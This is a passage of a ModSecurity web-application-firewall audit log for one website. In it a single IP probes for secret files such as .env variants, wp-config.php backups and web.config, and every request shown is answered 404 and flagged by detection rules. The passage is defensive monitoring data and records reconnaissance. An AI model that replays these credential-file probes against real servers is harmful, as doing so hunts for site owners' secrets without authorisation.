"/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/app/config/parameters.ini"] [unique_id "aFBqqplL5_2Zd8wUdfLIuwAAAAg"] Stopwatch: 1750100650867939 4417 (- - -) Stopwatch2: 1750100650867939 4417; combined=2670, p1=539, p2=2049, p3=0, p4=0, p5=82, sr=193, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --fda9d72d-Z-- --eba9290e-A-- [17/Jun/2025:00:34:10.983281 +0530] aFBqqn3hoSwVUy254pHz6gAAACQ 185.177.72.201 58394 127.0.0.1 7080 --eba9290e-B-- GET /app/config/routes.cfg HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --eba9290e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --eba9290e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".cfg"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/app/config/routes.cfg"] [unique_id "aFBqqn3hoSwVUy254pHz6gAAACQ"] Stopwatch: 1750100650979694 3640 (- - -) Stopwatch2: 1750100650979694 3640; combined=2117, p1=403, p2=1657, p3=0, p4=0, p5=57, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eba9290e-Z-- --4a86b772-A-- [17/Jun/2025:00:34:11.204724 +0530] aFBqqyid3pHxA3RhGpzp4AAAAAk 185.177.72.201 58416 127.0.0.1 7080 --4a86b772-B-- GET /wp-config.php.bk HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4a86b772-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4a86b772-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.bk"] [unique_id "aFBqqyid3pHxA3RhGpzp4AAAAAk"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.bk' not found or unable to stat Stopwatch: 1750100651201228 3564 (- - -) Stopwatch2: 1750100651201228 3564; combined=2044, p1=382, p2=1596, p3=0, p4=0, p5=65, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4a86b772-Z-- --e1e9b254-A-- [17/Jun/2025:00:34:11.315466 +0530] aFBqq1JfblPUQiSn5r1hRwAAAAA 185.177.72.201 58428 127.0.0.1 7080 --e1e9b254-B-- GET /backend/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e1e9b254-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e1e9b254-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/backend/.env"] [unique_id "aFBqq1JfblPUQiSn5r1hRwAAAAA"] Stopwatch: 1750100651312099 3421 (- - -) Stopwatch2: 1750100651312099 3421; combined=2018, p1=470, p2=1494, p3=0, p4=0, p5=54, sr=164, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e1e9b254-Z-- --e9cdb308-A-- [17/Jun/2025:00:34:11.426480 +0530] aFBqq5VkCcfT-Z8NQYyUhQAAAAc 185.177.72.201 58430 127.0.0.1 7080 --e9cdb308-B-- GET /wp-config.php.original HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e9cdb308-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --e9cdb308-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.original"] [unique_id "aFBqq5VkCcfT-Z8NQYyUhQAAAAc"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.original' not found or unable to stat Stopwatch: 1750100651423374 3160 (- - -) Stopwatch2: 1750100651423374 3160; combined=1775, p1=430, p2=1291, p3=0, p4=0, p5=54, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e9cdb308-Z-- --f17e7d3e-A-- [17/Jun/2025:00:34:11.647709 +0530] aFBqq38PxMRZ7s11niQJkwAAAAI 185.177.72.201 58452 127.0.0.1 7080 --f17e7d3e-B-- GET /prod/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f17e7d3e-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f17e7d3e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/prod/.env"] [unique_id "aFBqq38PxMRZ7s11niQJkwAAAAI"] Stopwatch: 1750100651644531 3231 (- - -) Stopwatch2: 1750100651644531 3231; combined=1871, p1=404, p2=1408, p3=0, p4=0, p5=58, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f17e7d3e-Z-- --f205d954-A-- [17/Jun/2025:00:34:11.979876 +0530] aFBqq5VkCcfT-Z8NQYyUhgAAAAc 185.177.72.201 58482 127.0.0.1 7080 --f205d954-B-- GET /test/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f205d954-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f205d954-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/test/.env"] [unique_id "aFBqq5VkCcfT-Z8NQYyUhgAAAAc"] Stopwatch: 1750100651976590 3341 (- - -) Stopwatch2: 1750100651976590 3341; combined=1963, p1=405, p2=1497, p3=0, p4=0, p5=61, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f205d954-Z-- --87d1ec67-A-- [17/Jun/2025:00:34:12.422411 +0530] aFBqrFJfblPUQiSn5r1hSQAAAAA 185.177.72.201 58542 127.0.0.1 7080 --87d1ec67-B-- GET /wp-config.php.0 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --87d1ec67-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --87d1ec67-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.0"] [unique_id "aFBqrFJfblPUQiSn5r1hSQAAAAA"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.0' not found or unable to stat Stopwatch: 1750100652419275 3204 (- - -) Stopwatch2: 1750100652419275 3204; combined=1836, p1=400, p2=1377, p3=0, p4=0, p5=59, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --87d1ec67-Z-- --741b3622-A-- [17/Jun/2025:00:34:12.532800 +0530] aFBqrH3hoSwVUy254pHz7QAAACQ 185.177.72.201 58554 127.0.0.1 7080 --741b3622-B-- GET /wp-config.php.swp HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --741b3622-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --741b3622-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.swp"] [unique_id "aFBqrH3hoSwVUy254pHz7QAAACQ"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.swp' not found or unable to stat Stopwatch: 1750100652529605 3252 (- - -) Stopwatch2: 1750100652529605 3252; combined=1960, p1=374, p2=1524, p3=0, p4=0, p5=62, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --741b3622-Z-- --6bf58f01-A-- [17/Jun/2025:00:34:13.196783 +0530] aFBqrZlL5_2Zd8wUdfLIwAAAAAg 185.177.72.201 58630 127.0.0.1 7080 --6bf58f01-B-- GET /web.config HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6bf58f01-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --6bf58f01-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config"] [unique_id "aFBqrZlL5_2Zd8wUdfLIwAAAAAg"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/web.config"] [unique_id "aFBqrZlL5_2Zd8wUdfLIwAAAAAg"] Stopwatch: 1750100653193482 3358 (- - -) Stopwatch2: 1750100653193482 3358; combined=1953, p1=402, p2=1435, p3=0, p4=0, p5=115, sr=110, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6bf58f01-Z-- --739a8231-A-- [17/Jun/2025:00:34:13.529769 +0530] aFBqrY3q6eGJ2xNcTd6GhgAAAAU 185.177.72.201 58670 127.0.0.1 7080 --739a8231-B-- GET /wp-config.php-bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --739a8231-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --739a8231-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php-bak"] [unique_id "aFBqrY3q6eGJ2xNcTd6GhgAAAAU"] Stopwatch: 1750100653526332 3507 (- - -) Stopwatch2: 1750100653526332 3507; combined=2164, p1=387, p2=1697, p3=0, p4=0, p5=80, sr=101, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --739a8231-Z-- --a81e1327-A-- [17/Jun/2025:00:34:13.972962 +0530] aFBqrX8PxMRZ7s11niQJlwAAAAI 185.177.72.201 58740 127.0.0.1 7080 --a81e1327-B-- GET /web.config.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a81e1327-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a81e1327-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.bak"] [unique_id "aFBqrX8PxMRZ7s11niQJlwAAAAI"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".config.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.bak"] [unique_id "aFBqrX8PxMRZ7s11niQJlwAAAAI"] Stopwatch: 1750100653969744 3296 (- - -) Stopwatch2: 1750100653969744 3296; combined=2085, p1=421, p2=1562, p3=0, p4=0, p5=102, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a81e1327-Z-- --4697dc1c-A-- [17/Jun/2025:00:34:14.195105 +0530] aFBqro3q6eGJ2xNcTd6GiAAAAAU 185.177.72.201 58774 127.0.0.1 7080 --4697dc1c-B-- GET /.env.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4697dc1c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --4697dc1c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".env.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.env.backup"] [unique_id "aFBqro3q6eGJ2xNcTd6GiAAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".env.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/.env.backup"] [unique_id "aFBqro3q6eGJ2xNcTd6GiAAAAAU"] Stopwatch: 1750100654191574 3588 (- - -) Stopwatch2: 1750100654191574 3588; combined=2125, p1=434, p2=1611, p3=0, p4=0, p5=80, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4697dc1c-Z-- --50525736-A-- [17/Jun/2025:00:34:14.305773 +0530] aFBqrhwcFb_n1P0IC9xlBgAAAAo 185.177.72.201 58788 127.0.0.1 7080 --50525736-B-- GET /settings.php.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --50525736-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --50525736-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/settings.php.old"] [unique_id "aFBqrhwcFb_n1P0IC9xlBgAAAAo"] Stopwatch: 1750100654302327 3521 (- - -) Stopwatch2: 1750100654302327 3521; combined=2140, p1=382, p2=1691, p3=0, p4=0, p5=67, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --50525736-Z-- --45f2ef4a-A-- [17/Jun/2025:00:34:14.417220 +0530] aFBqrn8PxMRZ7s11niQJmAAAAAI 185.177.72.201 58804 127.0.0.1 7080 --45f2ef4a-B-- GET /compose/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --45f2ef4a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --45f2ef4a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/compose/.env"] [unique_id "aFBqrn8PxMRZ7s11niQJmAAAAAI"] Stopwatch: 1750100654413459 3836 (- - -) Stopwatch2: 1750100654413459 3836; combined=2251, p1=523, p2=1660, p3=0, p4=0, p5=68, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --45f2ef4a-Z-- --ed5dc110-A-- [17/Jun/2025:00:34:14.748636 